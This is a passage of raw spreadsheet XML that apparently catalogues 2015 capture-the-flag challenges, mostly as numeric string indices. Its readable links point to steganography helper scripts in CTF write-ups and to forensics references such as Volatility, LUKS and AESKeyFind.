        <v>3900</v>
      </c>
      <c r="H283" s="30"/>
      <c r="I283" s="30"/>
    </row>
    <row r="284">
      <c r="A284" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B284" s="31">
        <v>2015.0</v>
      </c>
      <c r="C284" s="30" t="s">
        <v>3902</v>
      </c>
      <c r="D284" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E284" s="30"/>
      <c r="F284" s="30" t="s">
        <v>3904</v>
      </c>
      <c r="G284" s="30" t="s">
        <v>3905</v>
      </c>
      <c r="H284" s="30"/>
      <c r="I284" s="30"/>
    </row>
    <row r="285">
      <c r="A285" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B285" s="31">
        <v>2015.0</v>
      </c>
      <c r="C285" s="30" t="s">
        <v>3908</v>
      </c>
      <c r="D285" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E285" s="30" t="s">
        <v>2249</v>
      </c>
      <c r="F285" s="30" t="s">
        <v>3910</v>
      </c>
      <c r="G285" s="30" t="s">
        <v>3912</v>
      </c>
      <c r="H285" s="30"/>
      <c r="I285" s="30"/>
    </row>
    <row r="286">
      <c r="A286" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B286" s="31">
        <v>2015.0</v>
      </c>
      <c r="C286" s="30" t="s">
        <v>3914</v>
      </c>
      <c r="D286" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E286" s="30"/>
      <c r="F286" s="30" t="s">
        <v>3915</v>
      </c>
      <c r="G286" s="30" t="s">
        <v>3916</v>
      </c>
      <c r="H286" s="30"/>
      <c r="I286" s="30"/>
    </row>
    <row r="287">
      <c r="A287" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B287" s="43">
        <v>2015.0</v>
      </c>
      <c r="C287" s="5" t="s">
        <v>3919</v>
      </c>
      <c r="D287" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E287" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F287" s="5" t="s">
        <v>3922</v>
      </c>
      <c r="G287" s="5" t="s">
        <v>3923</v>
      </c>
      <c r="H287" s="3"/>
    </row>
    <row r="288">
      <c r="A288" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B288" s="43">
        <v>2015.0</v>
      </c>
      <c r="C288" s="5" t="s">
        <v>3927</v>
      </c>
      <c r="D288" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E288" s="3"/>
      <c r="F288" s="5" t="s">
        <v>3928</v>
      </c>
      <c r="G288" s="5" t="s">
        <v>3932</v>
      </c>
      <c r="H288" s="3"/>
    </row>
    <row r="289">
      <c r="A289" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B289" s="43">
        <v>2015.0</v>
      </c>
      <c r="C289" s="5" t="s">
        <v>3933</v>
      </c>
      <c r="D289" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E289" s="3"/>
      <c r="F289" s="5" t="s">
        <v>3934</v>
      </c>
      <c r="G289" s="5" t="s">
        <v>3936</v>
      </c>
      <c r="H289" s="3"/>
    </row>
    <row r="290">
      <c r="A290" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B290" s="43">
        <v>2015.0</v>
      </c>
      <c r="C290" s="5" t="s">
        <v>3938</v>
      </c>
      <c r="D290" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E290" s="5" t="s">
        <v>3939</v>
      </c>
      <c r="F290" s="5" t="s">
        <v>3940</v>
      </c>
      <c r="G290" s="5" t="s">
        <v>3941</v>
      </c>
      <c r="H290" s="3"/>
    </row>
    <row r="291">
      <c r="A291" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B291" s="43">
        <v>2015.0</v>
      </c>
      <c r="C291" s="5" t="s">
        <v>3942</v>
      </c>
      <c r="D291" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E291" s="5" t="s">
        <v>3944</v>
      </c>
      <c r="F291" s="5" t="s">
        <v>3945</v>
      </c>
      <c r="G291" s="5" t="s">
        <v>3947</v>
      </c>
      <c r="H291" s="5" t="s">
        <v>3949</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="s">
        <v>1446</v>
      </c>
      <c r="B292" s="43">
        <v>2015.0</v>
      </c>
      <c r="C292" s="5" t="s">
        <v>3950</v>
      </c>
      <c r="D292" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E292" s="5" t="s">
        <v>2290</v>
      </c>
      <c r="F292" s="5" t="s">
        <v>3951</v>
      </c>
      <c r="G292" s="5" t="s">
        <v>3953</v>
      </c>
      <c r="H292" s="3"/>
    </row>
    <row r="293">
      <c r="A293" s="5" t="s">
        <v>1446</v>
      </c>
      <c r="B293" s="43">
        <v>2015.0</v>
      </c>
      <c r="C293" s="5" t="s">
        <v>3955</v>
      </c>
      <c r="D293" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E293" s="5" t="s">
        <v>2290</v>
      </c>
      <c r="F293" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G293" s="5" t="s">
        <v>3956</v>
      </c>
      <c r="H293" s="3"/>
    </row>
    <row r="294">
      <c r="A294" s="5" t="s">
        <v>1446</v>
      </c>
      <c r="B294" s="43">
        <v>2015.0</v>
      </c>
      <c r="C294" s="5" t="s">
        <v>3958</v>
      </c>
      <c r="D294" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E294" s="5" t="s">
        <v>2663</v>
      </c>
      <c r="F294" s="5" t="s">
        <v>3960</v>
      </c>
      <c r="G294" s="5" t="s">
        <v>3961</v>
      </c>
      <c r="H294" s="5" t="s">
        <v>3962</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B295" s="43">
        <v>2015.0</v>
      </c>
      <c r="C295" s="5" t="s">
        <v>3964</v>
      </c>
      <c r="D295" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E295" s="5" t="s">
        <v>1222</v>
      </c>
      <c r="F295" s="5" t="s">
        <v>3966</v>
      </c>
      <c r="G295" s="5" t="s">
        <v>3967</v>
      </c>
      <c r="H295" s="5" t="s">
        <v>3968</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B296" s="43">
        <v>2015.0</v>
      </c>
      <c r="C296" s="5" t="s">
        <v>3970</v>
      </c>
      <c r="D296" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E296" s="5" t="s">
        <v>3972</v>
      </c>
      <c r="F296" s="5" t="s">
        <v>3973</v>
      </c>
      <c r="G296" s="5" t="s">
        <v>3974</v>
      </c>
      <c r="H296" s="3"/>
    </row>
    <row r="297">
      <c r="A297" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B297" s="43">
        <v>2015.0</v>
      </c>
      <c r="C297" s="5" t="s">
        <v>3975</v>
      </c>
      <c r="D297" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E297" s="5" t="s">
        <v>3978</v>
      </c>
      <c r="F297" s="5" t="s">
        <v>3979</v>
      </c>
      <c r="G297" s="5" t="s">
        <v>3980</v>
      </c>
      <c r="H297" s="3"/>
    </row>
    <row r="298">
      <c r="A298" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B298" s="43">
        <v>2015.0</v>
      </c>
      <c r="C298" s="5" t="s">
        <v>3982</v>
      </c>
      <c r="D298" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E298" s="5" t="s">
        <v>3984</v>
      </c>
      <c r="F298" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G298" s="5" t="s">
        <v>3987</v>
      </c>
      <c r="H298" s="5" t="s">
        <v>3988</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B299" s="43">
        <v>2015.0</v>
      </c>
      <c r="C299" s="5" t="s">
        <v>3991</v>
      </c>
      <c r="D299" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E299" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F299" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G299" s="5" t="s">
        <v>3992</v>
      </c>
      <c r="H299" s="5" t="s">
        <v>3993</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B300" s="43">
        <v>2015.0</v>
      </c>
      <c r="C300" s="5" t="s">
        <v>3996</v>
      </c>
      <c r="D300" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E300" s="5" t="s">
        <v>3972</v>
      </c>
      <c r="F300" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G300" s="56" t="s">
        <v>3997</v>
      </c>
      <c r="H300" s="5" t="s">
        <v>4000</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B301" s="31">
        <v>2015.0</v>
      </c>
      <c r="C301" s="30" t="s">
        <v>4004</v>
      </c>
      <c r="D301" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E301" s="30" t="s">
        <v>2290</v>
      </c>
      <c r="F301" s="30" t="s">
        <v>4005</v>
      </c>
      <c r="G301" s="30"/>
      <c r="H301" s="33" t="s">
        <v>4006</v>
      </c>
      <c r="I301" s="30"/>
      <c r="J301" s="30"/>
    </row>
    <row r="302">
      <c r="A302" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B302" s="31">
        <v>2015.0</v>
      </c>
      <c r="C302" s="30" t="s">
        <v>4010</v>
      </c>
      <c r="D302" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E302" s="30" t="s">
        <v>2290</v>
      </c>
      <c r="F302" s="30" t="s">
        <v>4014</v>
      </c>
      <c r="G302" s="30" t="s">
        <v>4017</v>
      </c>
      <c r="H302" s="30"/>
      <c r="I302" s="30"/>
      <c r="J302" s="30"/>
    </row>
    <row r="303">
      <c r="A303" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B303" s="31">
        <v>2015.0</v>
      </c>
      <c r="C303" s="30" t="s">
        <v>4018</v>
      </c>
      <c r="D303" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E303" s="30" t="s">
        <v>2370</v>
      </c>
      <c r="F303" s="30" t="s">
        <v>4019</v>
      </c>
      <c r="G303" s="30" t="s">
        <v>4020</v>
      </c>
      <c r="H303" s="30"/>
      <c r="I303" s="30"/>
      <c r="J303" s="30"/>
    </row>
    <row r="304">
      <c r="A304" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B304" s="31">
        <v>2015.0</v>
      </c>
      <c r="C304" s="30" t="s">
        <v>4023</v>
      </c>
      <c r="D304" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E304" s="30" t="s">
        <v>2290</v>
      </c>
      <c r="F304" s="30" t="s">
        <v>4026</v>
      </c>
      <c r="G304" s="30"/>
      <c r="H304" s="30"/>
      <c r="I304" s="30"/>
      <c r="J304" s="30"/>
    </row>
    <row r="305">
      <c r="A305" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B305" s="31">
        <v>2015.0</v>
      </c>
      <c r="C305" s="30" t="s">
        <v>4027</v>
      </c>
      <c r="D305" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E305" s="30" t="s">
        <v>2232</v>
      </c>
      <c r="F305" s="30" t="s">
        <v>4028</v>
      </c>
      <c r="G305" s="30"/>
      <c r="H305" s="30"/>
      <c r="I305" s="30"/>
      <c r="J305" s="30"/>
    </row>
    <row r="306">
      <c r="A306" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B306" s="31">
        <v>2015.0</v>
      </c>
      <c r="C306" s="30" t="s">
        <v>4029</v>
      </c>
      <c r="D306" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E306" s="30" t="s">
        <v>2290</v>
      </c>
      <c r="F306" s="30" t="s">
        <v>4030</v>
      </c>
      <c r="G306" s="30"/>
      <c r="H306" s="30"/>
      <c r="I306" s="30"/>
      <c r="J306" s="30"/>
    </row>
    <row r="307">
      <c r="A307" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B307" s="31">
        <v>2015.0</v>
      </c>
      <c r="C307" s="30" t="s">
        <v>4031</v>
      </c>
      <c r="D307" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E307" s="30" t="s">
        <v>2370</v>
      </c>
      <c r="F307" s="30" t="s">
        <v>4034</v>
      </c>
      <c r="G307" s="30"/>
      <c r="H307" s="182" t="s">
        <v>4035</v>
      </c>
      <c r="I307" s="30"/>
      <c r="J307" s="30"/>
    </row>
    <row r="308">
      <c r="A308" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B308" s="31">
        <v>2015.0</v>
      </c>
      <c r="C308" s="30" t="s">
        <v>4046</v>
      </c>
      <c r="D308" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E308" s="30" t="s">
        <v>4047</v>
      </c>
      <c r="F308" s="30" t="s">
        <v>4048</v>
      </c>
      <c r="G308" s="30"/>
      <c r="H308" s="30"/>
      <c r="I308" s="30"/>
      <c r="J308" s="30"/>
    </row>
    <row r="309">
      <c r="A309" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B309" s="31">
        <v>2015.0</v>
      </c>
      <c r="C309" s="30" t="s">
        <v>4049</v>
      </c>
      <c r="D309" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E309" s="30" t="s">
        <v>3271</v>
      </c>
      <c r="F309" s="30" t="s">
        <v>4052</v>
      </c>
      <c r="G309" s="30"/>
      <c r="H309" s="30"/>
      <c r="I309" s="30"/>
      <c r="J309" s="30"/>
    </row>
    <row r="310">
      <c r="A310" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B310" s="31">
        <v>2015.0</v>
      </c>
      <c r="C310" s="30" t="s">
        <v>4056</v>
      </c>
      <c r="D310" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E310" s="30"/>
      <c r="F310" s="30" t="s">
        <v>4058</v>
      </c>
      <c r="G310" s="30"/>
      <c r="H310" s="30"/>
      <c r="I310" s="30"/>
      <c r="J310" s="30"/>
    </row>
    <row r="311">
      <c r="A311" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B311" s="31">
        <v>2015.0</v>
      </c>
      <c r="C311" s="30" t="s">
        <v>4061</v>
      </c>
      <c r="D311" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E311" s="30" t="s">
        <v>4062</v>
      </c>
      <c r="F311" s="30" t="s">
        <v>4063</v>
      </c>
      <c r="G311" s="30"/>
      <c r="H311" s="30"/>
      <c r="I311" s="30"/>
      <c r="J311" s="30"/>
    </row>
    <row r="312">
      <c r="A312" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B312" s="31">
        <v>2015.0</v>
      </c>
      <c r="C312" s="183" t="s">
        <v>4065</v>
      </c>
      <c r="D312" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E312" s="30"/>
      <c r="F312" s="30" t="s">
        <v>4081</v>
      </c>
      <c r="G312" s="30" t="s">
        <v>4083</v>
      </c>
      <c r="H312" s="30"/>
      <c r="I312" s="30"/>
      <c r="J312" s="30"/>
    </row>
    <row r="313">
      <c r="A313" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B313" s="31">
        <v>2015.0</v>
      </c>
      <c r="C313" s="30" t="s">
        <v>4085</v>
      </c>
      <c r="D313" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E313" s="30"/>
      <c r="F313" s="30" t="s">
        <v>4086</v>
      </c>
      <c r="G313" s="30" t="s">
        <v>4087</v>
      </c>
      <c r="H313" s="30"/>
      <c r="I313" s="30"/>
      <c r="J313" s="30"/>
    </row>
    <row r="314">
      <c r="A314" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B314" s="31">
        <v>2015.0</v>
      </c>
      <c r="C314" s="30" t="s">
        <v>4088</v>
      </c>
      <c r="D314" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E314" s="30"/>
      <c r="F314" s="30" t="s">
        <v>4089</v>
      </c>
      <c r="G314" s="30" t="s">
        <v>4090</v>
      </c>
      <c r="H314" s="30"/>
      <c r="I314" s="30"/>
      <c r="J314" s="30"/>
    </row>
    <row r="315">
      <c r="A315" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B315" s="31">
        <v>2015.0</v>
      </c>
      <c r="C315" s="30" t="s">
        <v>4093</v>
      </c>
      <c r="D315" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E315" s="30"/>
      <c r="F315" s="30" t="s">
        <v>4093</v>
      </c>
      <c r="G315" s="30" t="s">
        <v>4095</v>
      </c>
      <c r="H315" s="30"/>
      <c r="I315" s="30"/>
      <c r="J315" s="30"/>
    </row>
    <row r="316">
      <c r="A316" s="30" t="s">
        <v>4096</v>
      </c>
      <c r="B316" s="31">
        <v>2015.0</v>
      </c>
      <c r="C316" s="30" t="s">
        <v>4097</v>
      </c>
      <c r="D316" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E316" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F316" s="30" t="s">
        <v>4099</v>
      </c>
      <c r="G316" s="30" t="s">
        <v>4100</v>
      </c>
      <c r="H316" s="30"/>
      <c r="I316" s="30"/>
      <c r="J316" s="30"/>
    </row>
    <row r="317">
      <c r="A317" s="17">
        <v>42577.0</v>
      </c>
      <c r="B317" s="65"/>
      <c r="C317" s="65"/>
      <c r="D317" s="65"/>
      <c r="E317" s="9"/>
      <c r="F317" s="65"/>
      <c r="G317" s="65"/>
      <c r="H317" s="66"/>
      <c r="I317" s="9"/>
      <c r="J317" s="9"/>
      <c r="K317" s="9"/>
      <c r="L317" s="9"/>
      <c r="M317" s="9"/>
      <c r="N317" s="9"/>
      <c r="O317" s="9"/>
      <c r="P317" s="9"/>
      <c r="Q317" s="9"/>
      <c r="R317" s="9"/>
      <c r="S317" s="9"/>
      <c r="T317" s="9"/>
      <c r="U317" s="9"/>
      <c r="V317" s="9"/>
      <c r="W317" s="9"/>
      <c r="X317" s="9"/>
      <c r="Y317" s="9"/>
      <c r="Z317" s="9"/>
    </row>
    <row r="318">
      <c r="A318" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B318" s="31">
        <v>2015.0</v>
      </c>
      <c r="C318" s="30" t="s">
        <v>4104</v>
      </c>
      <c r="D318" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E318" s="30" t="s">
        <v>3212</v>
      </c>
      <c r="F318" s="35" t="s">
        <v>4107</v>
      </c>
      <c r="G318" s="30" t="s">
        <v>4109</v>
      </c>
      <c r="H318" s="30" t="s">
        <v>4110</v>
      </c>
      <c r="I318" s="30"/>
      <c r="J318" s="30"/>
    </row>
    <row r="319">
      <c r="A319" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B319" s="31">
        <v>2015.0</v>
      </c>
      <c r="C319" s="30" t="s">
        <v>4112</v>
      </c>
      <c r="D319" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E319" s="30" t="s">
        <v>4114</v>
      </c>
      <c r="F319" s="35" t="s">
        <v>4107</v>
      </c>
      <c r="G319" s="30" t="s">
        <v>4117</v>
      </c>
      <c r="H319" s="30" t="s">
        <v>4118</v>
      </c>
      <c r="I319" s="30"/>
      <c r="J319" s="30"/>
    </row>
    <row r="320">
      <c r="A320" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B320" s="31">
        <v>2015.0</v>
      </c>
      <c r="C320" s="30" t="s">
        <v>4123</v>
      </c>
      <c r="D320" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E320" s="30" t="s">
        <v>2733</v>
      </c>
      <c r="F320" s="35" t="s">
        <v>4126</v>
      </c>
      <c r="G320" s="30" t="s">
        <v>4129</v>
      </c>
      <c r="H320" s="30" t="s">
        <v>4130</v>
      </c>
      <c r="I320" s="30"/>
      <c r="J320" s="30"/>
    </row>
    <row r="321">
      <c r="A321" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B321" s="31">
        <v>2015.0</v>
      </c>
      <c r="C321" s="30" t="s">
        <v>4132</v>
      </c>
      <c r="D321" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E321" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F321" s="35" t="s">
        <v>479</v>
      </c>
      <c r="G321" s="30" t="s">
        <v>4135</v>
      </c>
      <c r="H321" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="I321" s="30"/>
      <c r="J321" s="30"/>
      <c r="K321" s="30"/>
      <c r="L321" s="30"/>
    </row>
    <row r="322">
      <c r="A322" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B322" s="31">
        <v>2015.0</v>
      </c>
      <c r="C322" s="30" t="s">
        <v>4138</v>
      </c>
      <c r="D322" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E322" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F322" s="35" t="s">
        <v>479</v>
      </c>
      <c r="G322" s="30" t="s">
        <v>4139</v>
      </c>
      <c r="H322" s="30"/>
      <c r="I322" s="30"/>
      <c r="J322" s="30"/>
      <c r="K322" s="30"/>
      <c r="L322" s="30"/>
    </row>
    <row r="323">
      <c r="A323" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B323" s="31">
        <v>2015.0</v>
      </c>
      <c r="C323" s="30" t="s">
        <v>4140</v>
      </c>
      <c r="D323" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E323" s="30" t="s">
        <v>3212</v>
      </c>
      <c r="F323" s="35" t="s">
        <v>3551</v>
      </c>
      <c r="G323" s="30" t="s">
        <v>4141</v>
      </c>
      <c r="H323" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/blob/master/hack-dat-kiwi-ctf-2015/stegano/simple-stegano/pixels.py","pixels.py")</f>
        <v>pixels.py</v>
      </c>
      <c r="I323" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/blob/master/hack-dat-kiwi-ctf-2015/stegano/simple-stegano/getbinary.py","getbinary.py")</f>
        <v>getbinary.py</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B324" s="31">
        <v>2015.0</v>
      </c>
      <c r="C324" s="30" t="s">
        <v>4145</v>
      </c>
      <c r="D324" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E324" s="30" t="s">
        <v>4146</v>
      </c>
      <c r="F324" s="35" t="s">
        <v>4147</v>
      </c>
      <c r="G324" s="30" t="s">
        <v>4148</v>
      </c>
      <c r="H324" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup","LUKS ")</f>
        <v>LUKS </v>
      </c>
      <c r="I324" s="33" t="str">
        <f>HYPERLINK("https://www.synalysis.net/","Synalyze")</f>
        <v>Synalyze</v>
      </c>
      <c r="J324" s="33" t="str">
        <f>HYPERLINK("http://www.volatilityfoundation.org/","Volatility Foundation")</f>
        <v>Volatility Foundation</v>
      </c>
      <c r="K324" s="33" t="str">
        <f>HYPERLINK("https://citp.princeton.edu/research/memory/code/","AESKeyFind")</f>
        <v>AESKeyFind</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B325" s="31">
        <v>2015.0</v>
      </c>
      <c r="C325" s="30" t="s">
        <v>4158</v>
      </c>
      <c r="D325" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E325" s="30" t="s">
        <v>4159</v>
      </c>
      <c r="F325" s="35" t="s">
        <v>4160</v>
      </c>
      <c r="G325" s="30" t="s">
        <v>4161</v>
      </c>
      <c r="H325" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="I325" s="30"/>
      <c r="J325" s="33"/>
      <c r="K325" s="33"/>
    </row>
    <row r="326">
      <c r="A326" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B326" s="31">
        <v>2015.0</v>
      </c>
      <c r="C326" s="30" t="s">
        <v>4162</v>
      </c>
      <c r="D326" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E326" s="30" t="s">
        <v>4159</v>
      </c>
      <c r="F326" s="35" t="s">
        <v>4163</v>
      </c>
      <c r="G326" s="30" t="s">
        <v>4165</v>
      </c>
      <c r="H326" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="I326" s="30"/>
    </row>
    <row r="327">
      <c r="A327" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B327" s="31">
        <v>2015.0</v>
      </c>
      <c r="C327" s="30" t="s">
        <v>4168</v>
      </c>
      <c r="D327" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E327" s="30" t="s">
        <v>4169</v>
      </c>
      <c r="F327" s="35" t="s">
        <v>4170</v>
      </c>
      <c r="G327" s="30" t="s">
        <v>4171</v>
      </c>
      <c r="H327" s="33" t="str">
        <f>HYPERLINK("http://www.thonky.com/qr-code-tutorial/","QR Code Tutorial")</f>
        <v>QR Code Tutorial</v>
      </c>
      <c r="I327" s="30"/>
    </row>
    <row r="328">
      <c r="A328" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B328" s="31">
        <v>2015.0</v>
      </c>
      <c r="C328" s="30" t="s">
        <v>4175</v>
      </c>
      <c r="D328" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E328" s="30" t="s">
        <v>3212</v>
      </c>
      <c r="F328" s="35" t="s">
        <v>4176</v>
      </c>
      <c r="G328" s="30" t="s">
        <v>4177</v>
      </c>
      <c r="H328" s="30" t="s">
        <v>4178</v>
      </c>
      <c r="I328" s="30"/>
    </row>
    <row r="329">
      <c r="A329" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B329" s="31">
        <v>2015.0</v>
      </c>
      <c r="C329" s="30" t="s">
        <v>4179</v>
      </c>
      <c r="D329" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E329" s="30" t="s">
        <v>3212</v>
      </c>
      <c r="F329" s="35" t="s">
        <v>4176</v>
      </c>
      <c r="G329" s="30" t="s">
        <v>4180</v>
      </c>
      <c r="H329" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/blob/master/mma-ctf-2015/stego/miyako-350/pixels.py","pixels.py")</f>
        <v>pixels.py</v>
      </c>
      <c r="I329" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/blob/master/mma-ctf-2015/stego/miyako-350/picdiff.py","picdiff.py")</f>
        <v>picdiff.py</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B330" s="31">
        <v>2015.0</v>
      </c>
      <c r="C330" s="30" t="s">
        <v>4187</v>
      </c>
      <c r="D330" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E330" s="30" t="s">
        <v>4188</v>
      </c>
      <c r="F330" s="35" t="s">
        <v>3533</v>
      </c>
      <c r="G330" s="30" t="s">
        <v>4189</v>
      </c>
      <c r="H330" s="33" t="str">
        <f>HYPERLINK("http://md5decrypt.net/en/Sha256/","Sha256 encrypt and decrypt")</f>
        <v>Sha256 encrypt and decrypt</v>
      </c>
      <c r="I330" s="30"/>
      <c r="J330" s="30"/>
      <c r="K330" s="30"/>
    </row>
    <row r="331">
      <c r="A331" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B331" s="31">
        <v>2015.0</v>
      </c>
      <c r="C331" s="30" t="s">
        <v>4190</v>
      </c>
      <c r="D331" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E331" s="30" t="s">
        <v>4191</v>
      </c>
      <c r="F331" s="35" t="s">
        <v>4192</v>
      </c>
      <c r="G331" s="30" t="s">
        <v>4193</v>
      </c>
      <c r="H331" s="30" t="s">
        <v>4194</v>
      </c>
      <c r="I331" s="30"/>
      <c r="J331" s="30"/>
      <c r="K331" s="30"/>
    </row>
    <row r="332">
      <c r="A332" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B332" s="31">
        <v>2015.0</v>
      </c>
      <c r="C332" s="30" t="s">
        <v>4195</v>
      </c>
      <c r="D332" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E332" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F332" s="35" t="s">
        <v>4196</v>
      </c>
      <c r="G332" s="30" t="s">
        <v>4197</v>
      </c>
      <c r="H332" s="30" t="s">
        <v>3184</v>
      </c>
      <c r="I332" s="30"/>
      <c r="J332" s="30"/>
      <c r="K332" s="30"/>
    </row>
    <row r="333">
      <c r="A333" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B333" s="31">
        <v>2015.0</v>
      </c>
      <c r="C333" s="30" t="s">
        <v>4199</v>
      </c>
      <c r="D333" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E333" s="30" t="s">
        <v>4200</v>
      </c>
      <c r="F333" s="35" t="s">
        <v>4201</v>
      </c>
      <c r="G333" s="30" t="s">
        <v>4202</v>
      </c>
      <c r="H333" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Intel_HEX","Intel HEX")</f>
        <v>Intel HEX</v>
      </c>
      <c r="I333" s="33" t="str">
        <f>HYPERLINK("https://sourceforge.net/projects/hex2bin/","Hex To Bin")</f>
        <v>Hex To Bin</v>
      </c>
      <c r="J333" s="33" t="str">
        <f>HYPERLINK("https://doegox.github.io/ElectronicColoringBook/","./ElectronicColroingBook")</f>
        <v>./ElectronicColroingBook</v>
      </c>
      <c r="K333" s="30"/>
    </row>
    <row r="334">
      <c r="A334" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B334" s="31">
        <v>2015.0</v>
      </c>
      <c r="C334" s="30" t="s">
        <v>4205</v>
      </c>
      <c r="D334" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E334" s="30" t="s">
        <v>4075</v>
      </c>
      <c r="F334" s="35" t="s">
        <v>4207</v>
      </c>
      <c r="G334" s="30" t="s">
        <v>4210</v>
      </c>
      <c r="H334" s="30" t="s">
        <v>4211</v>
